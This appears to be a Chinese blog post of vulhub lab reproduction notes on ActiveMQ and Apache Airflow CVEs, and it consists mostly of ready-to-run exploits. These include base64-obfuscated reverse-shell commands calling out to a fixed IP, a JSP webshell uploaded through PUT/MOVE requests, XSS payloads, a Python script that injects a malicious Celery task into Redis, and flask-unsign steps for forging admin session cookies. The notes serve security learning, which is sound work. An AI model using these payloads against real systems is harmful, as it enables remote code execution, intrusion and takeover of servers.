vulhub复现

vulhub复现

A

activemq

ActiveMQ 反序列化漏洞(CVE-2015-5254)

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

通过web管理页面访问消息并触发漏洞这个过程需要管理员权限

通过jmet-0.1.0-all.jar中的ysoserial生成Payload进行getshell(需要进行编码)

1
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80My4xMzkuMTU0LjIxOS8xMjM0NSAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 43.139.154.219 61616

ActiveMQ任意文件写入漏洞(CVE-2016-3088)ActiveMQ 5.0.0 - 5.13.2

ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
PUT /fileserver/1.txt HTTP/1.1
Host: 43.139.154.219:8161
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 327

<%@ page import="java.io.*"%>
<%
out.print("Hello</br>");
String strcmd=request.getParameter("cmd");
String line=null;
Process p=Runtime.getRuntime().exec(strcmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null){
out.print(line+"</br>");
}
%>
1
2
3
4
5
6
7
8
9
10
11
12
MOVE /fileserver/1.txt HTTP/1.1
Destination:file:///opt/activemq/webapps/api/5.jsp
Host: 43.139.154.219:8161
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 0

ActiveMQ其他漏洞

https://github.com/justbaibai/Armory/tree/main/a/ActiveMQ

弱密码

admin/admin

未授权漏洞

1
2
/admin/connections.jsp
/api

信息泄露

1
2
3
http://www.example.com:8161//admin/index.jsp
http://www.example.com:8161//admin/queues.jsp
http://www.example.com:8161//admin/topics.jsp
1
2
3
4
5
6
会返回应用名称,JVM,操作系统以及内核版本等信息。
telnet ip:61616

影响版本:
apache-activemq-5.15.0 to apache-activemq-5.15.2
apache-activemq-5.14.0 to apache-activemq-5.14.5
1
PUT /fileserver/a../%08     较低版本有用

XSS漏洞

1
/admin/queueBrowse/example.A?view=rss&feedType=<script>alert("ACTIVEMQ")</script> 
1
/createDestination.action?JMSDestination=[XSS_PAYLOAD]
1
/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%22SpiderLabs%22)%3c%2fscript%3eqb68

airflow

Apache Airflow 示例dag中的命令注入(CVE-2020-11978)

未授权的访问者可以通过这个漏洞在Worker中执行任意命令。

进入airflow管理端,将example_trigger_target_dag前面的Off改为On:

image-20230726140237544

然后再Trigger DAG: example_trigger_target_dag中执行命令即可

image-20230726140226424

1
{"message":"\";bash -i >& /dev/tcp/43.139.154.219/1234 0>&1;#"}

原理,通过example_trigger_target_dagschedule: None直接调用dag_run,然后使用字符串拼接得到

image-20230726145900450

Apache Airflow Celery 消息中间件命令执行(CVE-2020-11981)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import pickle
import json
import base64
import redis
import sys
r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0)
queue_name = 'default'
ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"W1sxMDAsIDIwMF0sIHt9LCB7ImNoYWluIjogbnVsbCwgImNob3JkIjogbnVsbCwgImVycmJhY2tzIjogbnVsbCwgImNhbGxiYWNrcyI6IG51bGx9XQ==\"}"
task_dict = json.loads(ori_str)
#command = ['touch', '/tmp/airflow_celery_success']
command = ['bash','-c','{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80My4xMzkuMTU0LjIxOS8xMjM0NSAwPiYx}|{base64,-d}|{bash,-i}']
body=[[command], {}, {"chain": None, "chord": None, "errbacks": None, "callbacks": None}]
print(body)
task_dict['body']=base64.b64encode(json.dumps(body).encode()).decode()
print(task_dict)
r.lpush(queue_name,json.dumps(task_dict))

Apache Airflow 默认密钥导致的权限绕过(CVE-2020-17526)

1
2
pip3 install flask-unsign
pip3 install flask-unsign[wordlist]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
curl -v http://localhost:8080/admin/airflow/login
* Trying 127.0.0.1:8080...
* Connected to localhost (127.0.0.1) port 8080 (#0)
> GET /admin/airflow/login HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: gunicorn/19.10.0
< Date: Wed, 26 Jul 2023 07:44:11 GMT
< Connection: close
< Content-Type: text/html; charset=utf-8
< Content-Length: 7750
< Vary: Cookie
< Set-Cookie: session=eyJjc3JmX3Rva2VuIjoiN2QyYmViNjhhMjNkNjk4ZDdlZjJmM2M1M2ZhYThmZjU4MjNjNGM0MSJ9.ZMDOyw.2giwxxnjtgQEvMgUlvvCozp0hsg; HttpOnly; Path=/
1
flask-unsign -u -c eyJjc3JmX3Rva2VuIjoiN2QyYmViNjhhMjNkNjk4ZDdlZjJmM2M1M2ZhYThmZjU4MjNjNGM0MSJ9.ZMDOyw.2giwxxnjtgQEvMgUlvvCozp0hsg
1
flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"